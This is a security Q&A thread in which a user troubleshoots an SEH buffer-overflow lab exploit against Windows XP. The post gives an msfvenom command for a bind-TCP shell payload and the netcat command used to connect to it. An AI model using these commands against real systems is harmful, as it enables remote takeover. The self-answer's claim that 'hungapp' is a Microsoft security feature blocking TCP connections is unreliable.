2

Running a SEH BoF exploit script that contains a payload that is generated from msfvenom as such: 

msfvenom --payload windows/shell/bind_tcp --format py --arch x86 --platform windows --bad-chars "\x00\x20" EXITFUNC=seh

After running the script containing the said payload, I checked all active connections on the victim machine (WinXp SP3) by running netstat -an, there is an open port listening on 4444 (the default port from msf payload). However on the attacker's machine (Fedora 27) I was not able to spawn the shell using netcat as such: 

nc [victim IP] 4444

after running the above command the cursor just blinks below it. And after hitting enter (return), nc is killed and so is the vulnerable program from victim's PC. Anybody have any ideas?

The only possible explanation right now is that the problem lies within the payload from msfvenom? I assume that is because the payload was definitely executed since there was an open port at 4444 on the victim's PC. So if the problem did not exist while the script was running, then it must be the payload that is creating the problem, what do you guys think?

0x5929
  • 335
  • 4
  • 13
  • how is listening on port 4444 the target machine? using netcat or how? – OscarAkaElvis Apr 13 '18 at 08:17
  • No, after running the exploit script the buffer has my payload which is executed that binds a tcp shell on port 4444 – 0x5929 Apr 13 '18 at 15:46
  • I used netcat on my end (attacker machine) and tried to connect to the tcp shell on 4444 at my target machine IP but could not connect – 0x5929 Apr 13 '18 at 15:52

1 Answers1

0

After a while of messing with the attack, I noticed how the exploit would crash the program and the alerted error message contained a module called hungapp, and offset of 00000000. Some more research were done, hungapp looks like a microsoft security feature that blocks TCP connections. The last microsoft security update for the victim's pc was published in 5/15/2017, that most likely patched up against this type of Seh attack.

0x5929
  • 335
  • 4
  • 13